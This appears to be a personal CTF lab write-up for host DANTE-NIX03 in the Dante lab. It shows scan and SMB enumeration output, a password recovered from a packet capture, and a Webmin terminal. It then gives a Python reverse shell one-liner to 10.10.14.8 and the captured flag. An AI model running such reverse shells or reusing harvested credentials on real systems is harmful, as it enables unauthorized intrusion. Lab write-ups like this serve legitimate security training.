Enumeration

SMB         172.16.1.17     445    DANTE-NIX03      -----           -----------     ------
SMB         172.16.1.17     445    DANTE-NIX03      forensics       READ,WRITE
SMB         172.16.1.17     445    DANTE-NIX03      IPC$     
 
 
 
SMB         172.16.1.17     445    DANTE-NIX03      [*] Windows 6.1 Build 0 
(name:DANTE-NIX03) (domain:) (signing:False) (SMBv1:False)

Rustscan

rustscan -a 172.16.1.17 --ulimit 5000 -- -Pn -sV --script \"'vuln'\"

 
 
80/tcp    open  http        syn-ack Apache httpd 2.4.41
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
| http-enum:
|_  /: Root directory w/ listing on 'apache/2.4.41 (ubuntu)'
 
 
 
139/tcp   open  netbios-ssn syn-ack Samba smbd 4.6.2
| vulners:
|   cpe:/a:samba:samba:4.6.2:
|     	SSV:93139	10.0	https://vulners.com/seebug/SSV:93139	*EXPLOIT*
|     	SAMBA_IS_KNOWN_PIPENAME	10.0	https://vulners.com/canvas/SAMBA_IS_KNOWN_PIPENAME	*EXPLOIT*
 
 
445/tcp   open  netbios-ssn syn-ack Samba smbd 4.6.2
| vulners:
|   cpe:/a:samba:samba:4.6.2:
|     	SSV:93139	10.0	https://vulners.com/seebug/SSV:93139	*EXPLOIT*
|     	SAMBA_IS_KNOWN_PIPENAME	10.0	https://vulners.com/canvas/SAMBA_IS_KNOWN_PIPENAME	*EXPLOIT*
|     	SAINT:C50A339EFD5B2F96051BC00F96014CAA	10.0	https://vulners.com/saint/SAINT:C50A339EFD5B2F96051BC00F96014CAA	*EXPLOIT*
 
 
 
10000/tcp open  http        syn-ack MiniServ 1.900 (Webmin httpd)
| http-phpmyadmin-dir-traversal:
|   VULNERABLE:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: UNKNOWN (unable to test)
|     IDs:  CVE:CVE-2005-3299
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
 
 
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
33060/tcp open  mysqlx?     syn-ack
| fingerprint-strings:
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
|     Invalid message"
|_    HY000

SMB

✗ impacket-smbclient 172.16.1.17
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Type help for list of commands
# use forensics
# ls
drw-rw-rw-          0  Thu Jun 25 23:01:36 2020 .
drw-rw-rw-          0  Wed Jun 10 13:29:28 2020 ..
-rw-rw-rw-     153489  Thu Jun 25 23:01:07 2020 monitor
# download monitor
*** Unknown syntax: download monitor
# mget monitor
[*] Downloading monitor
# exit

Looking into wireshark

User: admin Password: password6543

MiniServ Webmin exploit

login
click on the ternimal icon

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.8",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Get the root shell

Flag

cat flag.txt

DANTE{SH4RKS_4R3_3V3RYWHERE}

Malleum Knowledge Base

Explorer

Enumeration

Rustscan

SMB

Looking into wireshark

MiniServ Webmin exploit

Flag

Graph View

Table of Contents